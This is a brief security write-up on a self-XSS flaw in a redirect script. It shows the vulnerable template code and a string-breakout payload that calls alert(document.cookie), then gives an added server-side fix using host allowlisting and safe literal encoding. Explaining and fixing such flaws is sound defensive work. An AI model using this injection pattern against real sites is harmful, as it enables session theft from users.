Self XSS

Vulnerable source:

document.addEventListener('DOMContentLoaded', function () {
    // {{kontol}} is a server-side template placeholder; the application replaces it
    // with a user-supplied value, so that value lands inside this JS string literal.
    var redirectUrl = "https://{{kontol}}/blahblah";
    if (window.top == window.self) {
        // If the current window is the 'parent', change the URL by setting location.href
        window.top.location.href = redirectUrl;
    } else {
        // If the current window is the 'child', change the parent's URL with postMessage
        var normalizedLink = document.createElement('a');
        normalizedLink.href = redirectUrl;

        var data = JSON.stringify({
            message: 'Shopify.API.remoteRedirect',
            data: { location: redirectUrl },
        });
        window.parent.postMessage(data, "https://{{kontol}}");
    }
});
The value is submitted in a POST request and the application substitutes it into the script in place of {{kontol}}, without escaping it for a JavaScript string context.
Use a payload like this: ";alert(document.cookie);var u="
"; closes the var redirectUrl string literal and ends the statement.
alert(document.cookie); adds the new function call (and is closed again with its own semicolon).
var u=" re-opens a string literal so the remainder of the original line parses without a syntax error.
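The root cause is that the server pastes an untrusted value straight into JavaScript source. The following is an added example, not code from the original post or from Shopify: a server-side renderer that validates the host against an allowlist and emits it only as a properly encoded string literal, so no submitted value can terminate the literal. The function names (renderRedirectScript, jsStringLiteral, isAllowedShopHost, compiles), the allowlist suffixes and the regex are assumptions for illustration.

```javascript
// Added example (not the original page's code): render the redirect script
// without interpolating raw input into JS source. The allowlist, regex and
// function names are assumptions made for this illustration.

// Expected shop domains (constructed for the example) and RFC-1123 host syntax.
const ALLOWED_SUFFIXES = ['.myshopify.com', '.example-shop.test'];
const HOST_RE = /^(?=.{1,253}$)([a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$/i;

// Reject anything that is not a plain hostname on an expected domain.
function isAllowedShopHost(host) {
  if (typeof host !== 'string' || !HOST_RE.test(host)) return false;
  const lower = host.toLowerCase();
  return ALLOWED_SUFFIXES.some((suffix) => lower.endsWith(suffix));
}

// Serialise a value as a JS string literal. JSON.stringify escapes quotes and
// backslashes; the extra replacements keep the literal safe inside a <script>
// element (no "</script>" breakout) and valid JS (U+2028/2029 are line
// terminators that JSON allows but JS source does not).
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Build the same redirect snippet as the vulnerable source, but from a
// validated host and with every dynamic value emitted as a single literal.
function renderRedirectScript(host) {
  if (!isAllowedShopHost(host)) {
    throw new Error('refusing to render redirect for unexpected host');
  }
  const redirectUrl = jsStringLiteral('https://' + host + '/blahblah');
  const origin = jsStringLiteral('https://' + host);
  return `document.addEventListener('DOMContentLoaded', function () {
  var redirectUrl = ${redirectUrl};
  if (window.top === window.self) {
    window.top.location.href = redirectUrl;
  } else {
    window.parent.postMessage(JSON.stringify({
      message: 'Shopify.API.remoteRedirect',
      data: { location: redirectUrl }
    }), ${origin});
  }
});`;
}

// Regression check for the renderer: the output must still be one parseable
// program. new Function only compiles the source, it never executes it.
function compiles(source) {
  try {
    new Function(source);
    return true;
  } catch (e) {
    return false;
  }
}
```

Note that escaping alone is not the whole fix: the redirect target and the postMessage origin are both derived from the host, so a syntactically harmless but attacker-chosen host would still redirect users and hand the message to an unexpected origin. That is why the allowlist check runs before any rendering.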
 
